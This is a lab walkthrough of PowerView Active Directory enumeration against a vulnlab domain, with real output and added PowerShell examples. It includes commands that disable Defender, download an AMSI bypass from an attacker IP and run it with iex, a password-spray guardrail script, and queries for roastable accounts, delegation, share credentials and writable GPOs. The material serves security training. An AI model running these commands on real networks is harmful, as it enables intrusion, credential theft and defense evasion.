PowerView Walkthrough
PowerView.ps1 is part of PowerSploit (Recon/PowerView.ps1 in https://github.com/PowerShellMafia/PowerSploit; the dev branch carries the current function names) and can be downloaded from there.
Documentation
For more functions, check out:
Some Awesome Cheat Sheets
HarmJ0y also has a good article on using some of PowerView’s interesting functionality.
Personal notes
In the demos below, I used the Delegate VM from vulnlab.
I logged in with WinRM as Administrator and disabled Windows Defender!
*Evil-WinRM* PS C:\windows\tasks> Set-MpPreference -DisableRealtimeMonitoring $true
I then downloaded PowerView onto one of my Windows 10 PCs for practice purposes.
First, you need to fire up your command prompt and type:
powershell.exe -nop -exec bypass
You then need to import the PowerView module as follows:
Import-Module [full path to powerview.ps1]
Alternatively, you could run:
powershell -ep bypass
Followed by:
. .\PowerView.ps1
From here we can start enumerating. 😉
We can get information about the domain as follows:
Get-NetDomain
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain

Forest                  : delegate.vl
DomainControllers       : {DC1.delegate.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC1.delegate.vl
RidRoleOwner            : DC1.delegate.vl
InfrastructureRoleOwner : DC1.delegate.vl
Name                    : delegate.vl
Getting information about DCs (any authenticated domain user can run this query; it does not need administrator rights, the Administrator context below is just what the lab gave me).
Again, disable AMSI first!
*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks>
Some of the commands below give an error (no clue why…)
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomainControllers
The term 'Get-NetDomainControllers' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
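The error above is a naming problem, not an AMSI problem. Current PowerView (the PowerSploit dev branch) names its functions Get-Domain* and keeps the older Get-Net* names only as aliases, and the domain-controller function is singular: Get-DomainController, with Get-NetDomainController as its alias. The following is an added example, not part of the original notes: it dot-sources PowerView from the directory used above (the path is assumed from the prompts shown), lists the alias-to-function mapping so the right name can be looked up instead of guessed, and then queries the DCs two ways.

```powershell
# Added example (not from the original notes). Load PowerView from the directory
# used above, then find the real function behind an old alias before guessing names.
. C:\windows\tasks\PowerView.ps1

# PowerView's Get-Net*/Invoke-* names are aliases; Definition is the function they
# point to, e.g. Get-NetDomainController -> Get-DomainController (no trailing s).
Get-Alias |
    Where-Object { $_.Name -like 'Get-Net*' -or $_.Name -like 'Invoke-*' } |
    Sort-Object Name |
    Format-Table Name, Definition -AutoSize

# Domain controllers via .NET DirectoryServices. Any authenticated domain user can
# run this; Roles shows which FSMO roles each DC holds (the PDC emulator is the one
# that sees password changes first and is the domain time source).
Get-DomainController |
    Select-Object Name, IPAddress, OSVersion, SiteName, @{n='Roles'; e={ $_.Roles -join ',' }} |
    Format-Table -AutoSize

# The same answer from LDAP: computers whose userAccountControl carries
# SERVER_TRUST_ACCOUNT. Useful when the DirectoryServices call fails, or when you
# only have an LDAP bind to a specific server (add -Server/-Credential).
Get-DomainController -LDAP |
    Select-Object dnshostname, operatingsystem, operatingsystemversion, useraccountcontrol
```

If a PowerView command is "not recognized", the Get-Alias table is the first thing to check; the second is whether the script actually finished loading, since an AMSI block on the file leaves you with none of the functions rather than a subset.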
To query domain policies
Get-DomainPolicy
*Evil-WinRM* PS C:\windows\tasks> Get-DomainPolicy

Unicode        : @{Unicode=yes}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0; LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Version        : @{signature="$CHICAGO$"; Revision=1}
Path           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName        : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy
The same policy from the ActiveDirectory PowerShell module (RSAT), for comparison; it also shows the lockout duration and observation window:
*Evil-WinRM* PS C:\windows\tasks> Get-ADDefaultDomainPasswordPolicy

ComplexityEnabled           : True
DistinguishedName           : DC=delegate,DC=vl
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
objectClass                 : {domainDNS}
objectGuid                  : b74fec45-7fd8-4db4-b82c-86e2727310ea
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False
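LockoutBadCount=0 (LockoutThreshold 0 in the RSAT output) is the line that matters: this domain never locks accounts, so a password spray is bounded only by detection, not by policy. The reverse case is the dangerous one, where a careless spray locks out a whole OU. The following added example, not part of the original notes, reads the policy PowerView returns (its values are strings parsed from GptTmpl.inf, hence the casts), derives a safe attempts-per-window number, and drops candidate passwords that cannot satisfy the policy anyway; the candidate list is a constructed sample.

```powershell
# Added example (not from the original notes): turn the domain password policy
# into spraying guardrails. SystemAccess holds the [System Access] section of the
# Default Domain Policy's GptTmpl.inf; every value arrives as a string.
$sys = (Get-DomainPolicy -Policy Domain).SystemAccess

$lockoutThreshold = [int]$sys.LockoutBadCount          # 0 means lockout is disabled
$minLength        = [int]$sys.MinimumPasswordLength
$complexity       = [int]$sys.PasswordComplexity -eq 1
$maxAgeDays       = [int]$sys.MaximumPasswordAge

# ResetLockoutCount (the observation window, in minutes) is only written to the INF
# when a threshold is set, so it may be absent, as it is in the output above.
$windowMin = if ($sys.PSObject.Properties['ResetLockoutCount']) { [int]$sys.ResetLockoutCount } else { $null }

if ($lockoutThreshold -eq 0) {
    'Lockout threshold is 0: no account lockout. Spray rate is a detection question, not a policy one.'
} else {
    # Stay two attempts under the threshold per window; a user may already have a
    # bad-password count from their own typos (badpwdcount on the user object).
    $safe = [Math]::Max($lockoutThreshold - 2, 1)
    "Lockout after $lockoutThreshold bad passwords, counter resets after $windowMin minutes."
    "Spray at most $safe password(s) per user every $windowMin minutes."
}
"Minimum length $minLength, complexity $(if ($complexity) { 'on' } else { 'off' }), max age $maxAgeDays days."

# Candidates that already violate the policy are wasted attempts (and wasted log noise).
# Complexity requires 3 of 4 character classes; booleans add up as 1/0 in PowerShell.
$candidates = @('Summer2024!', 'password', 'Welcome1', 'Autumn2024!')   # constructed sample list
$usable = $candidates | Where-Object {
    $_.Length -ge $minLength -and (
        -not $complexity -or
        (($_ -cmatch '[A-Z]') + ($_ -cmatch '[a-z]') + ($_ -match '\d') + ($_ -match '[^A-Za-z0-9]')) -ge 3
    )
}
"Policy-compliant candidates: $($usable -join ', ')"

# Cross-check against RSAT when it is available; LockoutObservationWindow is a TimeSpan here.
# Get-ADDefaultDomainPasswordPolicy | Select-Object LockoutThreshold, LockoutObservationWindow, LockoutDuration
```

With the policy above, 'password' is the only candidate dropped (no upper case, digit or symbol). Fine-grained password policies (PSOs) override the domain policy for the users they apply to and are not visible in GptTmpl.inf; a user's effective policy can differ from what this block reports.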
If we wanted to enumerate Users:
Get-NetUser
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser

logoncount             : 575
badpasswordtime        : 9/26/2023 2:28:11 AM
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=delegate,DC=vl
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 11/21/2024 11:31:42 PM
name                   : Administrator
objectsid              : S-1-5-21-1484473093-3449528695-2030935120-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
countrycode            : 0
whenchanged            : 11/22/2024 7:31:42 AM
instancetype           : 4
objectguid             : b27dc933-9a1f-4f1f-8d0d-07b1efdd6ae7
lastlogon              : 10/12/2023 3:05:06 AM
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=delegate,DC=vl, CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=vl, CN=Schema Admins,CN=Users,DC=delegate,DC=vl...}
whencreated            : 8/26/2023 9:39:30 AM
iscriticalsystemobject : True
badpwdcount            : 0
cn                     : Administrator
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
usncreated             : 8196
primarygroupid         : 513
pwdlastset             : 8/26/2023 8:46:29 AM
usnchanged             : 127024
The above command spits out a ton of information for every user. In an organization with many users this becomes unwieldy, so we can trim the output to a single attribute by running:
Get-NetUser | select cn
or
Get-NetUser | select samaccountname
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson
If we want to get all the groups a user is a member of
Get-DomainGroup -MemberIdentity username | select cn
or
Get-DomainGroup -MemberIdentity username | select samaccountname
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity b.brown | select cn

cn
--
Domain Users
If you wanted to check if the current user context has local administrator access
Invoke-CheckLocalAdminAccess
*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> Invoke-CheckLocalAdminAccess

ComputerName IsAdmin
------------ -------
localhost       True
Test-AdminAccess is the current name of the same function (Invoke-CheckLocalAdminAccess is kept as an alias). It checks the local machine by default and a remote one with -ComputerName; under the hood it tries to open the target's Service Control Manager with full access, which only local administrators are allowed to do, so it is a real access check rather than a group lookup.
Test-AdminAccess
*Evil-WinRM* PS C:\windows\tasks> Test-AdminAccess

ComputerName IsAdmin
------------ -------
localhost       True
Lazy admins can leave juicy details (passwords, hints, ticket numbers) in the description field. We can pull descriptions only by running:
Get-NetUser | select description
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser b.brown | select description

description
-----------

*Evil-WinRM* PS C:\windows\tasks>
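Selecting cn or description for every user is the start; the queries a tester actually runs next are the ones that pick out the accounts that can be attacked directly. The following added example (not part of the original notes) covers both the user enumeration above and the description hunting, using switches that exist on PowerView's Get-DomainUser (alias Get-NetUser) and Get-DomainGroup in the dev branch. The user name j.roberts is taken from the outputs on this page.

```powershell
# Added example (not from the original notes): the user queries worth running
# after Get-NetUser | select cn. -Properties limits the attributes returned, which
# keeps the LDAP reply small and the output readable.

# 1. Non-empty descriptions only; this is where passwords and hints get parked.
Get-DomainUser -Properties samaccountname,description |
    Where-Object { $_.description } |
    Format-Table samaccountname, description -AutoSize

# 2. Kerberoastable: users with a servicePrincipalName. Anyone with a TGT can request a
#    service ticket for them and crack it offline. krbtgt appears here; ignore it.
Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,pwdlastset |
    Format-Table samaccountname, pwdlastset, @{n='spn'; e={ $_.serviceprincipalname -join ';' }} -AutoSize

# 3. AS-REP roastable: Kerberos pre-authentication disabled, so an AS-REP with
#    crackable material can be obtained without knowing the password.
Get-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol

# 4. adminCount=1: is, or once was, in a group protected by AdminSDHolder.
#    The flag is never cleared automatically, so stale high-value accounts show up here.
Get-DomainUser -AdminCount -Properties samaccountname,memberof,lastlogontimestamp

# 5. Users allowed constrained delegation: they can impersonate others to the listed SPNs.
Get-DomainUser -TrustedToAuth -Properties samaccountname,'msds-allowedtodelegateto'

# 6. Effective groups of one user. -MemberIdentity reads the user's tokenGroups, so
#    nested security groups are included, but BUILTIN groups (S-1-5-32-*, e.g. Remote
#    Management Users) are filtered out; compare with the direct memberOf links.
Get-DomainGroup -MemberIdentity 'j.roberts' -Properties samaccountname,objectsid
Get-DomainUser -Identity 'j.roberts' -Properties memberof | Select-Object -ExpandProperty memberof
```

Query 6 explains why b.brown above shows only Domain Users even though the account can log in over WinRM: membership in the built-in Remote Management Users group is dropped from the tokenGroups view, and the memberOf attribute will list it when the membership is direct.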
Running the same group query for another user, j.roberts, reveals membership of a group that is not a default one:
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity j.roberts | select cn

cn
--
Domain Users
delegation admins
To get all the effective members of a group:
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain             : delegate.vl
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=delegate,DC=vl
MemberDomain            : delegate.vl
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=delegate,DC=vl
MemberObjectClass       : user
MemberSID               : S-1-5-21-1484473093-3449528695-2030935120-500
Get information about all computers:
Get-NetComputer
*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer

pwdlastset                    : 11/26/2024 10:55:07 PM
logoncount                    : 164
msds-generationid             : {46, 251, 32, 236...}
serverreferencebl             : CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=delegate,DC=vl
badpasswordtime               : 12/31/1600 4:00:00 PM
msds-additionaldnshostname    : dc1.debugger.vl
distinguishedname             : CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
objectclass                   : {top, person, organizationalPerson, user...}
displayname                   : DC1$
lastlogontimestamp            : 11/26/2024 10:55:04 PM
name                          : DC1
primarygroupid                : 516
objectsid                     : S-1-5-21-1484473093-3449528695-2030935120-1000
samaccountname                : DC1$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
whenchanged                   : 11/27/2024 6:55:28 AM
accountexpires                : NEVER
cn                            : DC1
operatingsystem               : Windows Server 2022 Standard
instancetype                  : 4
msdfsr-computerreferencebl    : CN=DC1,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=delegate,DC=vl
objectguid                    : 3dc17337-6dde-4562-8fc7-50cdd3a94def
operatingsystemversion        : 10.0 (20348)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata         : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.delegate.vl, TERMSRV/DC1, TERMSRV/DC1.delegate.vl, ldap/DC1.delegate.vl/DELEGATE...}
usncreated                    : 12293
lastlogon                     : 11/26/2024 10:55:34 PM
badpwdcount                   : 0
msds-additionalsamaccountname : DC1
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
whencreated                   : 8/26/2023 9:40:08 AM
countrycode                   : 0
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 127030
ridsetreferences              : CN=RID Set,CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
dnshostname                   : DC1.delegate.vl
Enumerating what operating systems are used on the domain
Get-NetComputer | select operatingsystem
*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer | select operatingsystem

operatingsystem
---------------
Windows Server 2022 Standard
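The operating system list tells you what to patch-check; the attributes that decide how a computer account can be abused are the delegation flags and the Kerberos encryption types, both visible in the DC1 output above (TRUSTED_FOR_DELEGATION, msds-supportedencryptiontypes 28). A domain controller legitimately has unconstrained delegation; a member server with it is a finding, because it caches the TGT of every user who authenticates to it. The following added example, not part of the original notes, pulls those attributes across the domain using Get-DomainComputer (alias Get-NetComputer) switches from the PowerView dev branch; the ConvertFrom-EncType helper is written here for illustration and is not a PowerView function.

```powershell
# Added example (not from the original notes): enumerate the computer attributes
# that matter for delegation abuse and ticket cracking.

# Unconstrained delegation (userAccountControl TRUSTED_FOR_DELEGATION). DCs always have
# it; anything that is not a DC (primaryGroupID 516 = Domain Controllers) is interesting.
Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol,primarygroupid |
    Where-Object { $_.primarygroupid -ne 516 }

# Constrained delegation: which service SPNs each host may impersonate users to.
Get-DomainComputer -TrustedToAuth -Properties dnshostname,'msds-allowedtodelegateto' |
    Format-List

# Resource-based constrained delegation already configured: some principal is allowed
# to act on behalf of users to these hosts.
Get-DomainComputer -LDAPFilter '(msds-allowedtoactonbehalfofotheridentity=*)' -Properties dnshostname

# Decode msds-supportedencryptiontypes, a bitmask. 28 on DC1 above = RC4 + AES128 + AES256.
# A host advertising only RC4 (4) gets RC4-encrypted service tickets, which crack far
# faster than AES ones. Helper written for this example, not part of PowerView.
function ConvertFrom-EncType {
    param([int]$Value)
    $flags = [ordered]@{ DES_CRC = 1; DES_MD5 = 2; RC4 = 4; AES128 = 8; AES256 = 16 }
    ($flags.GetEnumerator() | Where-Object { $Value -band $_.Value } | ForEach-Object { $_.Key }) -join '+'
}

Get-DomainComputer -Properties dnshostname,operatingsystem,'msds-supportedencryptiontypes',lastlogontimestamp |
    Select-Object dnshostname, operatingsystem, lastlogontimestamp,
        @{n='enctypes'; e={
            if ($_.'msds-supportedencryptiontypes') { ConvertFrom-EncType $_.'msds-supportedencryptiontypes' }
            else { '(unset: DC default applies)' }
        }} |
    Format-Table -AutoSize
```

lastlogontimestamp is included deliberately: a computer object that has not logged on for months is usually a decommissioned host whose account still exists, and stale machine accounts with delegation rights are a common finding in their own right.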
Enumerating groups
Get-NetGroup
This spits a ton of information
*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup > output.txt

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
admincount             : 1
iscriticalsystemobject : True
samaccounttype         : ALIAS_OBJECT
samaccountname         : Administrators
whenchanged            : 8/26/2023 9:55:18 AM
objectsid              : S-1-5-32-544
objectclass            : {top, group}
cn                     : Administrators
usnchanged             : 12772
systemflags            : -1946157056
name                   : Administrators
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 12:04:16 AM}
description            : Administrators have complete and unrestricted access to the computer/domain
distinguishedname      : CN=Administrators,CN=Builtin,DC=delegate,DC=vl
member                 : {CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=vl, CN=Administrator,CN=Users,DC=delegate,DC=vl}
usncreated             : 8199
whencreated            : 8/26/2023 9:39:30 AM
instancetype           : 4
objectguid             : 35c4abd9-945a-4fec-818a-b9ffa0a88c09
objectcategory         : CN=Group,CN=Schema,CN=Configuration,DC=delegate,DC=vl

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
description            : Users are prevented from making accidental or intentional system-wide changes and can run mo
member                 : {CN=Domain Users,CN=Users,DC=delegate,DC=vl, CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=del
etc. etc.
We can summarise all the information above by running
Get-NetGroup | select name
*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup | select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
delegation admins
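Almost everything in that list ships with every domain; the one line that tells you something about this environment is "delegation admins" at the bottom. Built-in groups carry SIDs under S-1-5-32-, and the default domain groups use well-known RIDs below 1000, so any group whose RID is 1000 or higher was created after the domain was, either by an admin or by a role install (DnsAdmins and DnsUpdateProxy come from the DNS role). The following added example, not part of the original notes, uses that rule to separate custom groups from the defaults and then resolves their effective members with Get-DomainGroupMember -Recurse, the same call used above for Domain Admins.

```powershell
# Added example (not from the original notes): find the groups that are specific to
# this domain and who is effectively in them.
$custom = Get-DomainGroup -Properties samaccountname,objectsid,description,whencreated,member |
    Where-Object {
        $_.objectsid -notlike 'S-1-5-32-*' -and              # skip BUILTIN
        [int]($_.objectsid -split '-')[-1] -ge 1000          # RID >= 1000: not a well-known group
    }

$custom | Format-Table samaccountname, whencreated, description -AutoSize

# Effective membership, following nested groups. MemberObjectClass tells user from
# group from computer; a foreignSecurityPrincipal points at a trusted domain.
foreach ($g in $custom) {
    Get-DomainGroupMember -Identity $g.samaccountname -Recurse |
        Select-Object GroupName, MemberName, MemberObjectClass, MemberSID
}

# Custom groups that inherited domain-level privilege: being nested inside a protected
# group propagates adminCount=1 to the group through AdminSDHolder.
Get-DomainGroup -AdminCount -Properties samaccountname,objectsid |
    Where-Object { [int]($_.objectsid -split '-')[-1] -ge 1000 }
```

Read the group name together with its members: a group called "delegation admins" is only a hint, and what it can actually do is decided by the ACLs and delegation settings on the objects it has rights over, not by the name.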
To locate shares on hosts in the local domain
Invoke-ShareFinder
*Evil-WinRM* PS C:\windows\tasks> Invoke-ShareFinder

Name     Type       Remark             ComputerName
----     ----       ------             ------------
ADMIN$   2147483648 Remote Admin       DC1.delegate.vl
C$       2147483648 Default share      DC1.delegate.vl
IPC$     2147483651 Remote IPC         DC1.delegate.vl
NETLOGON 0          Logon server share DC1.delegate.vl
SYSVOL   0          Logon server share DC1.delegate.vl
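Every host returns ADMIN$, C$ and IPC$, and every DC returns NETLOGON and SYSVOL, so a raw share list is mostly noise on a large domain. Invoke-ShareFinder is an alias for Find-DomainShare, which can also test whether the current user can read each share, and Find-InterestingDomainShareFile walks readable shares for files worth opening. The following added example, not part of the original notes, filters out the defaults, keeps only readable shares, and then searches for credential-bearing files; the -Include patterns are an assumed starting list.

```powershell
# Added example (not from the original notes): shares the current user can read,
# minus the ones that exist on every Windows host.
$default = 'ADMIN$', 'C$', 'IPC$', 'PRINT$', 'NETLOGON', 'SYSVOL'

Find-DomainShare -CheckShareAccess |
    Where-Object { $default -notcontains $_.Name } |
    Format-Table ComputerName, Name, Remark -AutoSize

# SYSVOL is worth a pass on its own: Group Policy Preferences XML files (Groups.xml,
# ScheduledTasks.xml, ...) can still carry cpassword values, which are AES-encrypted
# with a key Microsoft published, i.e. recoverable by anyone who can read the file.
Find-InterestingDomainShareFile -Include '*.xml','*.config','*.ini','*.ps1','*pass*','*cred*','unattend*' |
    Select-Object Path, Owner, LastWriteTime, Length |
    Sort-Object LastWriteTime -Descending
```

Both functions touch every computer object in the domain over SMB, which is loud; on a real engagement scope them with -ComputerName or -ComputerDomain rather than sweeping the whole domain from a single host.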
To pull Group Policy Objects (GPOs):
Get-NetGPO
This spits a ton of information
*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO

usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69785
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 9
instancetype             : 4
objectguid               : 3b9a44f2-0449-4fa2-87f6-d7255d9613f4
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69787
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 8
instancetype             : 4
objectguid               : 108e9cde-591e-4f3f-a3b4-d51b9ac0dd55
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl
We can narrow it down by selecting specific attributes. For example
Get-NetGPO | select displayname, whenchanged, whencreated
*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO | select displayname, whenchanged, whencreated

displayname                       whenchanged         whencreated
-----------                       -----------         -----------
Default Domain Policy             9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM
Default Domain Controllers Policy 9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM
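Names and dates say which GPOs exist; what matters for an attacker is where each one is linked, whether it hands out local group membership, and who is allowed to edit it, because write access to a linked GPO is code execution on every machine it applies to. The following added example, not part of the original notes, answers those three questions with PowerView dev-branch functions (Get-DomainOU -GPLink, Get-DomainGPOLocalGroup and its per-computer and per-user mapping variants, Get-DomainObjectAcl). The domain DN, the DC name and the user j.roberts are taken from the outputs on this page.

```powershell
# Added example (not from the original notes): from "which GPOs exist" to
# "where do they apply, what do they grant, and who can change them".

# 1. Links. OU links live in the OU's gPLink attribute; the Default Domain Policy is
#    linked at the domain root, which is on the domain object itself, not an OU.
Get-DomainObject -Identity 'DC=delegate,DC=vl' -Properties distinguishedname,gplink | Format-List
Get-DomainGPO -Properties displayname,name | ForEach-Object {
    $gpo = $_
    Get-DomainOU -GPLink $gpo.name.Trim('{}') -Properties distinguishedname |
        Select-Object @{n='GPO'; e={ $gpo.displayname }}, distinguishedname
}

# 2. GPOs that push local group membership (Restricted Groups or GPP Groups.xml).
#    Each record maps a domain principal into a local group on every computer the
#    GPO reaches; "GroupMembers" into Administrators is the one to look for.
Get-DomainGPOLocalGroup | Format-List GPODisplayName, GroupName, GroupMembers, GroupMemberOf

# The same mapping resolved from the computer's side and from the user's side.
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity 'DC1.delegate.vl'
Get-DomainGPOUserLocalGroupMapping -Identity 'j.roberts'

# 3. Who can modify each GPO. Anything beyond read on a GPO object lets that principal
#    change the policy every linked computer will apply at the next refresh.
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object { $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl|WriteOwner|GenericAll|GenericWrite' } |
    Select-Object ObjectDN, ActiveDirectoryRights,
        @{n='Principal'; e={ ConvertFrom-SID $_.SecurityIdentifier }}
```

Expect the default entries in step 3 (Domain Admins, Enterprise Admins, SYSTEM, and Creator Owner); anything else, in particular a user or a custom group such as the one seen earlier, is the finding. The GPO's files under gpcfilesyspath in SYSVOL have their own NTFS ACL, which should be checked the same way, since editing the file is as good as editing the object.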
If you have any questions, don’t ask